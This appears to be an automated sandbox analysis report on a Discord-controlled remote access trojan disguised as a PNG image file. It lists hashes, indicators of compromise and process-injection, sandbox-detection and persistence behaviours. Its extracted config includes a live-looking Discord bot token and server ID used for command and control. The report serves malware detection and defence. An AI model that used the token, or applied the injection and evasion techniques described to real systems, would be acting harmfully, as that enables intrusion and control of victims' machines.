discordrat | e87911dfa2c3bcbdd2ee2d92e577bc167d18bc439f3f9317960b69e5879000e8

Analysis

max time kernel
899s
max time network
862s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
13-05-2024 15:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fiat_uno.png.exe
Size

108KB
MD5

1cc7a8f7370419409b1781edbdfab184
SHA1

c1755bdac85a762b93007cd354c564d23da5ca9d
SHA256

e87911dfa2c3bcbdd2ee2d92e577bc167d18bc439f3f9317960b69e5879000e8
SHA512

50eb994fbacbc666512a0c026eac083f0fc92d16ab133e71a5e51355433b9f101b7d6098e7ce610347911338d2fff3b75b2e2b1dfcefd4eabf28d5de3e75af50
SSDEEP

1536:92WjO8XeEXFd5P7v88wbjNrfxCXhRoKV6+V+pPI3QxLUbTkJiJ+CKkWkh4UpV:9Zz5PDwbjNrmAE+ZI3Qok0+CKXaF

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
OTQ5ODM0ODg4MzkwMDA4ODky.GetiJM.JNqFsu5laAGDOQG7THpEiuBqUW382MMDsx-AYE
server_id
1083215987110838322

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1900 created 584	1900	Fiat_uno.png.exe	5
PID 1900 created 584	1900	Fiat_uno.png.exe	5

Blocklisted process makes network request 2 IoCs

flow	pid	Process
43	2288	powershell.exe
45	2288	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1384	dismhost.exe

Loads dropped DLL 17 IoCs

pid	Process
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe
1384	dismhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs

Web Service

T1102

flow	ioc
35	raw.githubusercontent.com
41	discord.com
4	discord.com
17	discord.com
26	discord.com
28	discord.com
31	discord.com
5	discord.com
29	discord.com
32	discord.com
37	discord.com
40	raw.githubusercontent.com
44	bitbucket.org
45	bitbucket.org
38	discord.com
9	discord.com
16	discord.com
27	discord.com
30	discord.com
33	raw.githubusercontent.com

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Resume On Boot	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Maintenance Install	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Combined Scan Download Install	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Policy Install	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-International%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1900 set thread context of 4260	1900	Fiat_uno.png.exe	86
PID 1900 set thread context of 2652	1900	Fiat_uno.png.exe	88

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1672	sc.exe
4876	sc.exe
2684	sc.exe
1052	sc.exe
808	sc.exe
4516	sc.exe
3444	sc.exe
1996	sc.exe
2792	sc.exe
4320	sc.exe
796	sc.exe
2640	sc.exe
4684	sc.exe
4208	sc.exe
2684	sc.exe
2896	sc.exe
196	sc.exe
3088	sc.exe
4448	sc.exe
2076	sc.exe
3004	sc.exe
3564	sc.exe
240	sc.exe
4728	sc.exe
1964	sc.exe
2184	sc.exe
1628	sc.exe
5112	sc.exe
2752	sc.exe
4600	sc.exe
4704	sc.exe
3452	sc.exe
2140	sc.exe
4472	sc.exe
808	sc.exe
60	sc.exe
876	sc.exe
4200	sc.exe
1352	sc.exe
4916	sc.exe
1996	sc.exe
1484	sc.exe
1896	sc.exe
2604	sc.exe
2204	sc.exe
1036	sc.exe
4840	sc.exe
1384	sc.exe
3760	sc.exe
1244	sc.exe
3080	sc.exe
700	sc.exe
4156	sc.exe
1484	sc.exe
2684	sc.exe
1016	sc.exe
976	sc.exe
8	sc.exe
4144	sc.exe
4620	sc.exe
3336	sc.exe
4328	sc.exe
4720	sc.exe
316	sc.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	Clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	Clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	Clipup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	Clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	clipup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies data under HKEY_USERS 20 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\AuthCookies\Live\Default\DIDC\Flags = "8256"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400EDF4C5D91"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\AuthCookies\Live\Default\DIDC	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\AuthCookies\Live\Default\DIDC\URL = "https://login.live.com"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\AuthCookies\Live\Default\DIDC\Data = "ct%3D1715615607%26hashalg%3DSHA256%26bver%3D14%26appid%3DDefault%26da%3D%253CEncryptedData%2520xmlns%253D%2522http://www.w3.org/2001/04/xmlenc%2523%2522%2520Id%253D%2522devicesoftware%2522%2520Type%253D%2522http://www.w3.org/2001/04/xmlenc%2523Element%2522%253E%253CEncryptionMethod%2520Algorithm%253D%2522http://www.w3.org/2001/04/xmlenc%2523tripledes-cbc%2522%253E%253C/EncryptionMethod%253E%253Cds:KeyInfo%2520xmlns:ds%253D%2522http://www.w3.org/2000/09/xmldsig%2523%2522%253E%253Cds:KeyName%253Ehttp://Passport.NET/STS%253C/ds:KeyName%253E%253C/ds:KeyInfo%253E%253CCipherData%253E%253CCipherValue%253EM.C542_BL2.0.D.Crk3FlNsqH0URIdNEoOcMoEU9jgxHeeisfT2sKzahbKJyd%252BSZNb76JJWcY49tkvTk3ejPCUpYZkju%252BKgVAoDgFLNlqFPp%252BevfmkgNuRSXa4Rq9HJA3Bz8lkdYpjhw3IK9SJAN7jSHPu9zS%252BGkTXvAqjv6buPQk2eANUWUtmZG2aJIRZKVcBnYK80EhILsVYZ6Hph%252BBq5zt0du5xJ4cg7tOewNhd4B4mbNJ23soBJF8T87UQ8HPJmDzas3ZLWR5Y2fmXhg0Htlv3o7/AHlUSbMjZnmyON3M5jzgioK8rMuT633JGGqpVxHzQQolBQUgRo/bV84fY8RtMECZr/EOWlrSSMKhWJx9uMoYCTIc837y2X/9RyUW6y6N9Uf4P7w6mKd4%252BvH0C92KYByjHkIaDilkW%252BXz59sMV0Gc/KrvGUPSXCls71iMeiChwjEem%252B9IFGmGpOJrMZoujcgpjiJi/1qWtf9wamHpa0lgwctUU2gJnO%252BLFuM30xwCPDdcfaQdUCorzVyscJJeQTR4Ze110ogMk%253D%253C/CipherValue%253E%253C/CipherData%253E%253C/EncryptedData%253E%26nonce%3DXU63D6KMzPLtmOV4OgV%252BzLsWgEVjlq%252Fz%26hash%3D%252BbD02pAtUFemxTop4TLvkVALbQ0wZqMTsvZWR%252BK5irM%253D%26dd%3D1; path=/; domain=login.live.com; secure; httponly"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\AuthCookies\Live\Default\DIDC\Name = "DIDC"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Explorer.EXE

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
1016	reg.exe
8	reg.exe
2932	reg.exe
992	reg.exe
2648	reg.exe
3576	reg.exe
4508	reg.exe
2772	reg.exe
3480	reg.exe
2640	reg.exe
3692	reg.exe
680	reg.exe
4508	reg.exe
872	reg.exe
2964	reg.exe
4304	reg.exe
2232	reg.exe
2328	reg.exe
196	reg.exe
4712	reg.exe
4736	reg.exe
680	reg.exe
60	reg.exe
828	reg.exe
4520	reg.exe
2644	reg.exe
436	reg.exe
2924	reg.exe
3080	reg.exe
400	reg.exe
4316	reg.exe
1372	reg.exe
2952	reg.exe
2216	reg.exe
4120	reg.exe
304	reg.exe
1236	reg.exe
4580	reg.exe
1372	reg.exe
4688	reg.exe
2672	reg.exe
2984	reg.exe
4520	reg.exe
4228	reg.exe
2656	reg.exe
872	reg.exe
4712	reg.exe
2768	reg.exe
2332	reg.exe
4908	reg.exe
64	reg.exe
316	reg.exe
2344	reg.exe
2328	reg.exe
2728	reg.exe
3400	reg.exe
4328	reg.exe
1492	reg.exe
4688	reg.exe
4544	reg.exe
3524	reg.exe
4848	reg.exe
4588	reg.exe
3572	reg.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4592	PING.EXE
2792	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3412	Explorer.EXE
2896	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1900	Fiat_uno.png.exe
Token: SeDebugPrivilege	4132	taskmgr.exe
Token: SeSystemProfilePrivilege	4132	taskmgr.exe
Token: SeCreateGlobalPrivilege	4132	taskmgr.exe
Token: 33	4132	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4132	taskmgr.exe
Token: SeDebugPrivilege	1900	Fiat_uno.png.exe
Token: SeDebugPrivilege	4260	dllhost.exe
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeManageVolumePrivilege	1500	DllHost.exe
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeDebugPrivilege	2652	dllhost.exe
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeAuditPrivilege	2348	svchost.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeIncreaseQuotaPrivilege	2220	WMIC.exe
Token: SeSecurityPrivilege	2220	WMIC.exe
Token: SeTakeOwnershipPrivilege	2220	WMIC.exe
Token: SeLoadDriverPrivilege	2220	WMIC.exe
Token: SeSystemProfilePrivilege	2220	WMIC.exe
Token: SeSystemtimePrivilege	2220	WMIC.exe
Token: SeProfSingleProcessPrivilege	2220	WMIC.exe
Token: SeIncBasePriorityPrivilege	2220	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe
4132	taskmgr.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3412	Explorer.EXE
3948	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 1488	1900	Fiat_uno.png.exe	77
PID 1900 wrote to memory of 1488	1900	Fiat_uno.png.exe	77
PID 1488 wrote to memory of 2668	1488	cmd.exe	79
PID 1488 wrote to memory of 2668	1488	cmd.exe	79
PID 1900 wrote to memory of 1332	1900	Fiat_uno.png.exe	80
PID 1900 wrote to memory of 1332	1900	Fiat_uno.png.exe	80
PID 1900 wrote to memory of 1916	1900	Fiat_uno.png.exe	82
PID 1900 wrote to memory of 1916	1900	Fiat_uno.png.exe	82
PID 1916 wrote to memory of 2604	1916	cmd.exe	84
PID 1916 wrote to memory of 2604	1916	cmd.exe	84
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 1900 wrote to memory of 4260	1900	Fiat_uno.png.exe	86
PID 4260 wrote to memory of 584	4260	dllhost.exe	5
PID 4260 wrote to memory of 640	4260	dllhost.exe	7
